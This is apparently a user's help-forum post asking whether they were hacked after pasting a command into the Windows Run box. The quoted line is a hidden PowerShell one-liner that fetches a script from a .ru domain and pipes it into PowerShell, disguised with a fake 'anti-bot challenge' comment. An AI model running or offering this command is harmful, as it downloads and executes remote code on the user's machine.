I ran a command in Win+R, am i hacked?

I was stupid enough to run this command in Win+R Run window:

powershell -w h (Invoke-RestMethod 'https://e.overallwobbly.ru/era-stc') | powershell; ""COMMAnti-Bot challenge confirmed and accepted: 100008437

Did i get hacked? What happened exactly? What should i do?
